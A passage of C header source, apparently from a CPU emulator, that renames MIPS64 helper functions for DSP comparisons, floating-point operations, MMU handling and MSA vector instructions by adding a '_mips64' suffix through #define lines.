helper_dinsv_mips64 #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64 #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64 #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64 #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64 #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64 #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64 #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64 #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64 #define helper_cmpu_le_qb helper_cmpu_le_qb_mips64 #define helper_cmp_eq_ph helper_cmp_eq_ph_mips64 #define helper_cmp_lt_ph helper_cmp_lt_ph_mips64 #define helper_cmp_le_ph helper_cmp_le_ph_mips64 #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64 #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64 #define helper_cmpu_le_ob helper_cmpu_le_ob_mips64 #define helper_cmp_eq_qh helper_cmp_eq_qh_mips64 #define helper_cmp_lt_qh helper_cmp_lt_qh_mips64 #define helper_cmp_le_qh helper_cmp_le_qh_mips64 #define helper_cmp_eq_pw helper_cmp_eq_pw_mips64 #define helper_cmp_lt_pw helper_cmp_lt_pw_mips64 #define helper_cmp_le_pw helper_cmp_le_pw_mips64 #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64 #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64 #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64 #define helper_pick_qb helper_pick_qb_mips64 #define helper_pick_ph helper_pick_ph_mips64 #define helper_pick_ob helper_pick_ob_mips64 #define helper_pick_qh helper_pick_qh_mips64 #define helper_pick_pw helper_pick_pw_mips64 #define helper_packrl_ph helper_packrl_ph_mips64 #define helper_packrl_pw helper_packrl_pw_mips64 #define helper_extr_w helper_extr_w_mips64 #define helper_extr_r_w helper_extr_r_w_mips64 #define helper_extr_rs_w helper_extr_rs_w_mips64 #define helper_dextr_w helper_dextr_w_mips64 #define helper_dextr_r_w helper_dextr_r_w_mips64 #define helper_dextr_rs_w helper_dextr_rs_w_mips64 #define helper_dextr_l helper_dextr_l_mips64 #define helper_dextr_r_l helper_dextr_r_l_mips64 #define helper_dextr_rs_l helper_dextr_rs_l_mips64 #define helper_extr_s_h helper_extr_s_h_mips64 #define helper_dextr_s_h helper_dextr_s_h_mips64 #define helper_extp helper_extp_mips64 #define helper_extpdp helper_extpdp_mips64 #define helper_dextp helper_dextp_mips64 #define helper_dextpdp helper_dextpdp_mips64 #define helper_shilo helper_shilo_mips64 #define helper_dshilo helper_dshilo_mips64 #define helper_mthlip helper_mthlip_mips64 #define helper_dmthlip helper_dmthlip_mips64 #define cpu_wrdsp cpu_wrdsp_mips64 #define helper_wrdsp helper_wrdsp_mips64 #define cpu_rddsp cpu_rddsp_mips64 #define helper_rddsp helper_rddsp_mips64 #define helper_cfc1 helper_cfc1_mips64 #define helper_ctc1 helper_ctc1_mips64 #define ieee_ex_to_mips ieee_ex_to_mips_mips64 #define helper_float_sqrt_d helper_float_sqrt_d_mips64 #define helper_float_sqrt_s helper_float_sqrt_s_mips64 #define helper_float_cvtd_s helper_float_cvtd_s_mips64 #define helper_float_cvtd_w helper_float_cvtd_w_mips64 #define helper_float_cvtd_l helper_float_cvtd_l_mips64 #define helper_float_cvt_l_d helper_float_cvt_l_d_mips64 #define helper_float_cvt_l_s helper_float_cvt_l_s_mips64 #define helper_float_cvtps_pw helper_float_cvtps_pw_mips64 #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64 #define helper_float_cvts_d helper_float_cvts_d_mips64 #define helper_float_cvts_w helper_float_cvts_w_mips64 #define helper_float_cvts_l helper_float_cvts_l_mips64 #define helper_float_cvts_pl helper_float_cvts_pl_mips64 #define helper_float_cvts_pu helper_float_cvts_pu_mips64 #define helper_float_cvt_w_s helper_float_cvt_w_s_mips64 #define helper_float_cvt_w_d helper_float_cvt_w_d_mips64 #define helper_float_round_l_d helper_float_round_l_d_mips64 #define helper_float_round_l_s helper_float_round_l_s_mips64 #define helper_float_round_w_d helper_float_round_w_d_mips64 #define helper_float_round_w_s helper_float_round_w_s_mips64 #define helper_float_trunc_l_d helper_float_trunc_l_d_mips64 #define helper_float_trunc_l_s helper_float_trunc_l_s_mips64 #define helper_float_trunc_w_d helper_float_trunc_w_d_mips64 #define helper_float_trunc_w_s helper_float_trunc_w_s_mips64 #define helper_float_ceil_l_d helper_float_ceil_l_d_mips64 #define helper_float_ceil_l_s helper_float_ceil_l_s_mips64 #define helper_float_ceil_w_d helper_float_ceil_w_d_mips64 #define helper_float_ceil_w_s helper_float_ceil_w_s_mips64 #define helper_float_floor_l_d helper_float_floor_l_d_mips64 #define helper_float_floor_l_s helper_float_floor_l_s_mips64 #define helper_float_floor_w_d helper_float_floor_w_d_mips64 #define helper_float_floor_w_s helper_float_floor_w_s_mips64 #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mips64 #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mips64 #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mips64 #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mips64 #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mips64 #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mips64 #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mips64 #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mips64 #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mips64 #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mips64 #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mips64 #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mips64 #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mips64 #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mips64 #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mips64 #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mips64 #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mips64 #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mips64 #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mips64 #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mips64 #define helper_float_abs_d helper_float_abs_d_mips64 #define helper_float_abs_s helper_float_abs_s_mips64 #define helper_float_abs_ps helper_float_abs_ps_mips64 #define helper_float_chs_d helper_float_chs_d_mips64 #define helper_float_chs_s helper_float_chs_s_mips64 #define helper_float_chs_ps helper_float_chs_ps_mips64 #define helper_float_recip_d helper_float_recip_d_mips64 #define helper_float_recip_s helper_float_recip_s_mips64 #define helper_float_rsqrt_d helper_float_rsqrt_d_mips64 #define helper_float_rsqrt_s helper_float_rsqrt_s_mips64 #define helper_float_recip1_d helper_float_recip1_d_mips64 #define helper_float_recip1_s helper_float_recip1_s_mips64 #define helper_float_recip1_ps helper_float_recip1_ps_mips64 #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64 #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64 #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64 #define helper_float_rint_s helper_float_rint_s_mips64 #define helper_float_rint_d helper_float_rint_d_mips64 #define float_class_s float_class_s_mips64 #define helper_float_class_s helper_float_class_s_mips64 #define float_class_d float_class_d_mips64 #define helper_float_class_d helper_float_class_d_mips64 #define helper_float_add_d helper_float_add_d_mips64 #define helper_float_add_s helper_float_add_s_mips64 #define helper_float_add_ps helper_float_add_ps_mips64 #define helper_float_sub_d helper_float_sub_d_mips64 #define helper_float_sub_s helper_float_sub_s_mips64 #define helper_float_sub_ps helper_float_sub_ps_mips64 #define helper_float_mul_d helper_float_mul_d_mips64 #define helper_float_mul_s helper_float_mul_s_mips64 #define helper_float_mul_ps helper_float_mul_ps_mips64 #define helper_float_div_d helper_float_div_d_mips64 #define helper_float_div_s helper_float_div_s_mips64 #define helper_float_div_ps helper_float_div_ps_mips64 #define helper_float_recip2_d helper_float_recip2_d_mips64 #define helper_float_recip2_s helper_float_recip2_s_mips64 #define helper_float_recip2_ps helper_float_recip2_ps_mips64 #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64 #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64 #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64 #define helper_float_addr_ps helper_float_addr_ps_mips64 #define helper_float_mulr_ps helper_float_mulr_ps_mips64 #define helper_float_max_s helper_float_max_s_mips64 #define helper_float_max_d helper_float_max_d_mips64 #define helper_float_maxa_s helper_float_maxa_s_mips64 #define helper_float_maxa_d helper_float_maxa_d_mips64 #define helper_float_min_s helper_float_min_s_mips64 #define helper_float_min_d helper_float_min_d_mips64 #define helper_float_mina_s helper_float_mina_s_mips64 #define helper_float_mina_d helper_float_mina_d_mips64 #define helper_float_madd_d helper_float_madd_d_mips64 #define helper_float_madd_s helper_float_madd_s_mips64 #define helper_float_madd_ps helper_float_madd_ps_mips64 #define helper_float_msub_d helper_float_msub_d_mips64 #define helper_float_msub_s helper_float_msub_s_mips64 #define helper_float_msub_ps helper_float_msub_ps_mips64 #define helper_float_nmadd_d helper_float_nmadd_d_mips64 #define helper_float_nmadd_s helper_float_nmadd_s_mips64 #define helper_float_nmadd_ps helper_float_nmadd_ps_mips64 #define helper_float_nmsub_d helper_float_nmsub_d_mips64 #define helper_float_nmsub_s helper_float_nmsub_s_mips64 #define helper_float_nmsub_ps helper_float_nmsub_ps_mips64 #define helper_float_maddf_s helper_float_maddf_s_mips64 #define helper_float_maddf_d helper_float_maddf_d_mips64 #define helper_float_msubf_s helper_float_msubf_s_mips64 #define helper_float_msubf_d helper_float_msubf_d_mips64 #define helper_cmp_d_f helper_cmp_d_f_mips64 #define helper_cmpabs_d_f helper_cmpabs_d_f_mips64 #define helper_cmp_d_un helper_cmp_d_un_mips64 #define helper_cmpabs_d_un helper_cmpabs_d_un_mips64 #define helper_cmp_d_eq helper_cmp_d_eq_mips64 #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64 #define helper_cmp_d_ueq helper_cmp_d_ueq_mips64 #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64 #define helper_cmp_d_olt helper_cmp_d_olt_mips64 #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64 #define helper_cmp_d_ult helper_cmp_d_ult_mips64 #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64 #define helper_cmp_d_ole helper_cmp_d_ole_mips64 #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64 #define helper_cmp_d_ule helper_cmp_d_ule_mips64 #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64 #define helper_cmp_d_sf helper_cmp_d_sf_mips64 #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64 #define helper_cmp_d_ngle helper_cmp_d_ngle_mips64 #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64 #define helper_cmp_d_seq helper_cmp_d_seq_mips64 #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64 #define helper_cmp_d_ngl helper_cmp_d_ngl_mips64 #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64 #define helper_cmp_d_lt helper_cmp_d_lt_mips64 #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64 #define helper_cmp_d_nge helper_cmp_d_nge_mips64 #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64 #define helper_cmp_d_le helper_cmp_d_le_mips64 #define helper_cmpabs_d_le helper_cmpabs_d_le_mips64 #define helper_cmp_d_ngt helper_cmp_d_ngt_mips64 #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64 #define helper_cmp_s_f helper_cmp_s_f_mips64 #define helper_cmpabs_s_f helper_cmpabs_s_f_mips64 #define helper_cmp_s_un helper_cmp_s_un_mips64 #define helper_cmpabs_s_un helper_cmpabs_s_un_mips64 #define helper_cmp_s_eq helper_cmp_s_eq_mips64 #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64 #define helper_cmp_s_ueq helper_cmp_s_ueq_mips64 #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64 #define helper_cmp_s_olt helper_cmp_s_olt_mips64 #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64 #define helper_cmp_s_ult helper_cmp_s_ult_mips64 #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64 #define helper_cmp_s_ole helper_cmp_s_ole_mips64 #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64 #define helper_cmp_s_ule helper_cmp_s_ule_mips64 #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64 #define helper_cmp_s_sf helper_cmp_s_sf_mips64 #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64 #define helper_cmp_s_ngle helper_cmp_s_ngle_mips64 #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64 #define helper_cmp_s_seq helper_cmp_s_seq_mips64 #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64 #define helper_cmp_s_ngl helper_cmp_s_ngl_mips64 #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64 #define helper_cmp_s_lt helper_cmp_s_lt_mips64 #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64 #define helper_cmp_s_nge helper_cmp_s_nge_mips64 #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64 #define helper_cmp_s_le helper_cmp_s_le_mips64 #define helper_cmpabs_s_le helper_cmpabs_s_le_mips64 #define helper_cmp_s_ngt helper_cmp_s_ngt_mips64 #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64 #define helper_cmp_ps_f helper_cmp_ps_f_mips64 #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64 #define helper_cmp_ps_un helper_cmp_ps_un_mips64 #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64 #define helper_cmp_ps_eq helper_cmp_ps_eq_mips64 #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64 #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64 #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64 #define helper_cmp_ps_olt helper_cmp_ps_olt_mips64 #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64 #define helper_cmp_ps_ult helper_cmp_ps_ult_mips64 #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64 #define helper_cmp_ps_ole helper_cmp_ps_ole_mips64 #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64 #define helper_cmp_ps_ule helper_cmp_ps_ule_mips64 #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64 #define helper_cmp_ps_sf helper_cmp_ps_sf_mips64 #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64 #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64 #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64 #define helper_cmp_ps_seq helper_cmp_ps_seq_mips64 #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64 #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64 #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64 #define helper_cmp_ps_lt helper_cmp_ps_lt_mips64 #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64 #define helper_cmp_ps_nge helper_cmp_ps_nge_mips64 #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64 #define helper_cmp_ps_le helper_cmp_ps_le_mips64 #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64 #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64 #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64 #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64 #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64 #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64 #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64 #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64 #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64 #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64 #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64 #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64 #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64 #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64 #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64 #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64 #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64 #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64 #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64 #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64 #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64 #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64 #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64 #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64 #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64 #define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64 #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64 #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64 #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64 #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64 #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64 #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64 #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64 #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64 #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64 #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64 #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64 #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64 #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64 #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64 #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64 #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64 #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64 #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64 #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64 #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64 #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64 #define no_mmu_map_address no_mmu_map_address_mips64 #define fixed_mmu_map_address fixed_mmu_map_address_mips64 #define r4k_map_address r4k_map_address_mips64 #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mips64 #define sync_c0_status sync_c0_status_mips64 #define cpu_mips_store_status cpu_mips_store_status_mips64 #define cpu_mips_store_cause cpu_mips_store_cause_mips64 #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64 #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mips64 #define cpu_mips_translate_address cpu_mips_translate_address_mips64 #define exception_resume_pc exception_resume_pc_mips64 #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64 #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64 #define r4k_invalidate_tlb r4k_invalidate_tlb_mips64 #define do_raise_exception_err do_raise_exception_err_mips64 #define helper_paddsb helper_paddsb_mips64 #define helper_paddusb helper_paddusb_mips64 #define helper_paddsh helper_paddsh_mips64 #define helper_paddush helper_paddush_mips64 #define helper_paddb helper_paddb_mips64 #define helper_paddh helper_paddh_mips64 #define helper_paddw helper_paddw_mips64 #define helper_psubsb helper_psubsb_mips64 #define helper_psubusb helper_psubusb_mips64 #define helper_psubsh helper_psubsh_mips64 #define helper_psubush helper_psubush_mips64 #define helper_psubb helper_psubb_mips64 #define helper_psubh helper_psubh_mips64 #define helper_psubw helper_psubw_mips64 #define helper_pshufh helper_pshufh_mips64 #define helper_packsswh helper_packsswh_mips64 #define helper_packsshb helper_packsshb_mips64 #define helper_packushb helper_packushb_mips64 #define helper_punpcklwd helper_punpcklwd_mips64 #define helper_punpckhwd helper_punpckhwd_mips64 #define helper_punpcklhw helper_punpcklhw_mips64 #define helper_punpckhhw helper_punpckhhw_mips64 #define helper_punpcklbh helper_punpcklbh_mips64 #define helper_punpckhbh helper_punpckhbh_mips64 #define helper_pavgh helper_pavgh_mips64 #define helper_pavgb helper_pavgb_mips64 #define helper_pmaxsh helper_pmaxsh_mips64 #define helper_pminsh helper_pminsh_mips64 #define helper_pmaxub helper_pmaxub_mips64 #define helper_pminub helper_pminub_mips64 #define helper_pcmpeqw helper_pcmpeqw_mips64 #define helper_pcmpgtw helper_pcmpgtw_mips64 #define helper_pcmpeqh helper_pcmpeqh_mips64 #define helper_pcmpgth helper_pcmpgth_mips64 #define helper_pcmpeqb helper_pcmpeqb_mips64 #define helper_pcmpgtb helper_pcmpgtb_mips64 #define helper_psllw helper_psllw_mips64 #define helper_psrlw helper_psrlw_mips64 #define helper_psraw helper_psraw_mips64 #define helper_psllh helper_psllh_mips64 #define helper_psrlh helper_psrlh_mips64 #define helper_psrah helper_psrah_mips64 #define helper_pmullh helper_pmullh_mips64 #define helper_pmulhh helper_pmulhh_mips64 #define helper_pmulhuh helper_pmulhuh_mips64 #define helper_pmaddhw helper_pmaddhw_mips64 #define helper_pasubub helper_pasubub_mips64 #define helper_biadd helper_biadd_mips64 #define helper_pmovmskb helper_pmovmskb_mips64 #define helper_msa_nloc_b helper_msa_nloc_b_mips64 #define helper_msa_nloc_h helper_msa_nloc_h_mips64 #define helper_msa_nloc_w helper_msa_nloc_w_mips64 #define helper_msa_nloc_d helper_msa_nloc_d_mips64 #define helper_msa_nlzc_b helper_msa_nlzc_b_mips64 #define helper_msa_nlzc_h helper_msa_nlzc_h_mips64 #define helper_msa_nlzc_w helper_msa_nlzc_w_mips64 #define helper_msa_nlzc_d helper_msa_nlzc_d_mips64 #define helper_msa_pcnt_b helper_msa_pcnt_b_mips64 #define helper_msa_pcnt_h helper_msa_pcnt_h_mips64 #define helper_msa_pcnt_w helper_msa_pcnt_w_mips64 #define helper_msa_pcnt_d helper_msa_pcnt_d_mips64 #define helper_msa_binsl_b helper_msa_binsl_b_mips64 #define helper_msa_binsl_h helper_msa_binsl_h_mips64 #define helper_msa_binsl_w helper_msa_binsl_w_mips64 #define helper_msa_binsl_d helper_msa_binsl_d_mips64 #define helper_msa_binsr_b helper_msa_binsr_b_mips64 #define helper_msa_binsr_h helper_msa_binsr_h_mips64 #define helper_msa_binsr_w helper_msa_binsr_w_mips64 #define helper_msa_binsr_d helper_msa_binsr_d_mips64 #define helper_msa_bmnz_v helper_msa_bmnz_v_mips64 #define helper_msa_bmz_v helper_msa_bmz_v_mips64 #define helper_msa_bsel_v helper_msa_bsel_v_mips64 #define helper_msa_bclr_b helper_msa_bclr_b_mips64 #define helper_msa_bclr_h helper_msa_bclr_h_mips64 #define helper_msa_bclr_w helper_msa_bclr_w_mips64 #define helper_msa_bclr_d helper_msa_bclr_d_mips64 #define helper_msa_bneg_b helper_msa_bneg_b_mips64 #define helper_msa_bneg_h helper_msa_bneg_h_mips64 #define helper_msa_bneg_w helper_msa_bneg_w_mips64 #define helper_msa_bneg_d helper_msa_bneg_d_mips64 #define helper_msa_bset_b helper_msa_bset_b_mips64 #define helper_msa_bset_h helper_msa_bset_h_mips64 #define helper_msa_bset_w helper_msa_bset_w_mips64 #define helper_msa_bset_d helper_msa_bset_d_mips64 #define helper_msa_add_a_b helper_msa_add_a_b_mips64 #define helper_msa_add_a_h helper_msa_add_a_h_mips64 #define helper_msa_add_a_w helper_msa_add_a_w_mips64 #define helper_msa_add_a_d helper_msa_add_a_d_mips64 #define helper_msa_adds_a_b helper_msa_adds_a_b_mips64 #define helper_msa_adds_a_h helper_msa_adds_a_h_mips64 #define helper_msa_adds_a_w helper_msa_adds_a_w_mips64 #define helper_msa_adds_a_d helper_msa_adds_a_d_mips64 #define helper_msa_adds_s_b helper_msa_adds_s_b_mips64 #define helper_msa_adds_s_h helper_msa_adds_s_h_mips64 #define helper_msa_adds_s_w helper_msa_adds_s_w_mips64 #define helper_msa_adds_s_d helper_msa_adds_s_d_mips64 #define helper_msa_adds_u_b helper_msa_adds_u_b_mips64 #define helper_msa_adds_u_h helper_msa_adds_u_h_mips64 #define helper_msa_adds_u_w helper_msa_adds_u_w_mips64 #define helper_msa_adds_u_d helper_msa_adds_u_d_mips64 #define helper_msa_addv_b helper_msa_addv_b_mips64 #define helper_msa_addv_h helper_msa_addv_h_mips64 #define helper_msa_addv_w helper_msa_addv_w_mips64 #define helper_msa_addv_d helper_msa_addv_d_mips64 #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mips64 #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mips64 #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mips64 #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mips64 #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mips64 #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mips64 #define helper_msa_ave_s_b helper_msa_ave_s_b_mips64 #define helper_msa_ave_s_h helper_msa_ave_s_h_mips64 #define helper_msa_ave_s_w helper_msa_ave_s_w_mips64 #define helper_msa_ave_s_d helper_msa_ave_s_d_mips64 #define helper_msa_ave_u_b helper_msa_ave_u_b_mips64 #define helper_msa_ave_u_h helper_msa_ave_u_h_mips64 #define helper_msa_ave_u_w helper_msa_ave_u_w_mips64 #define helper_msa_ave_u_d helper_msa_ave_u_d_mips64 #define helper_msa_aver_s_b helper_msa_aver_s_b_mips64 #define helper_msa_aver_s_h helper_msa_aver_s_h_mips64 #define helper_msa_aver_s_w helper_msa_aver_s_w_mips64 #define helper_msa_aver_s_d helper_msa_aver_s_d_mips64 #define helper_msa_aver_u_b helper_msa_aver_u_b_mips64 #define helper_msa_aver_u_h helper_msa_aver_u_h_mips64 #define helper_msa_aver_u_w helper_msa_aver_u_w_mips64 #define helper_msa_aver_u_d helper_msa_aver_u_d_mips64 #define helper_msa_ceq_b helper_msa_ceq_b_mips64 #define helper_msa_ceq_h helper_msa_ceq_h_mips64 #define helper_msa_ceq_w helper_msa_ceq_w_mips64 #define helper_msa_ceq_d helper_msa_ceq_d_mips64 #define helper_msa_cle_s_b helper_msa_cle_s_b_mips64 #define helper_msa_cle_s_h helper_msa_cle_s_h_mips64 #define helper_msa_cle_s_w helper_msa_cle_s_w_mips64 #define helper_msa_cle_s_d helper_msa_cle_s_d_mips64 #define helper_msa_cle_u_b helper_msa_cle_u_b_mips64 #define helper_msa_cle_u_h helper_msa_cle_u_h_mips64 #define helper_msa_cle_u_w helper_msa_cle_u_w_mips64 #define helper_msa_cle_u_d helper_msa_cle_u_d_mips64 #define helper_msa_clt_s_b helper_msa_clt_s_b_mips64 #define helper_msa_clt_s_h helper_msa_clt_s_h_mips64 #define helper_msa_clt_s_w helper_msa_clt_s_w_mips64 #define helper_msa_clt_s_d helper_msa_clt_s_d_mips64 #define helper_msa_clt_u_b helper_msa_clt_u_b_mips64 #define helper_msa_clt_u_h helper_msa_clt_u_h_mips64 #define helper_msa_clt_u_w helper_msa_clt_u_w_mips64 #define helper_msa_clt_u_d helper_msa_clt_u_d_mips64 #define helper_msa_div_s_b helper_msa_div_s_b_mips64 #define helper_msa_div_s_h helper_msa_div_s_h_mips64 #define helper_msa_div_s_w helper_msa_div_s_w_mips64 #define helper_msa_div_s_d helper_msa_div_s_d_mips64 #define helper_msa_div_u_b helper_msa_div_u_b_mips64 #define helper_msa_div_u_h helper_msa_div_u_h_mips64 #define helper_msa_div_u_w helper_msa_div_u_w_mips64 #define helper_msa_div_u_d helper_msa_div_u_d_mips64 #define helper_msa_max_a_b helper_msa_max_a_b_mips64 #define helper_msa_max_a_h helper_msa_max_a_h_mips64 #define helper_msa_max_a_w helper_msa_max_a_w_mips64 #define helper_msa_max_a_d helper_msa_max_a_d_mips64 #define helper_msa_max_s_b helper_msa_max_s_b_mips64 #define helper_msa_max_s_h helper_msa_max_s_h_mips64 #define helper_msa_max_s_w helper_msa_max_s_w_mips64 #define helper_msa_max_s_d helper_msa_max_s_d_mips64 #define helper_msa_max_u_b helper_msa_max_u_b_mips64 #define helper_msa_max_u_h helper_msa_max_u_h_mips64 #define helper_msa_max_u_w helper_msa_max_u_w_mips64 #define helper_msa_max_u_d helper_msa_max_u_d_mips64 #define helper_msa_min_a_b helper_msa_min_a_b_mips64 #define helper_msa_min_a_h helper_msa_min_a_h_mips64 #define helper_msa_min_a_w helper_msa_min_a_w_mips64 #define helper_msa_min_a_d helper_msa_min_a_d_mips64 #define helper_msa_min_s_b helper_msa_min_s_b_mips64 #define helper_msa_min_s_h helper_msa_min_s_h_mips64 #define helper_msa_min_s_w helper_msa_min_s_w_mips64 #define helper_msa_min_s_d helper_msa_min_s_d_mips64 #define helper_msa_min_u_b helper_msa_min_u_b_mips64 #define helper_msa_min_u_h helper_msa_min_u_h_mips64 #define helper_msa_min_u_w helper_msa_min_u_w_mips64 #define helper_msa_min_u_d helper_msa_min_u_d_mips64 #define helper_msa_mod_s_b helper_msa_mod_s_b_mips64 #define helper_msa_mod_s_h helper_msa_mod_s_h_mips64 #define 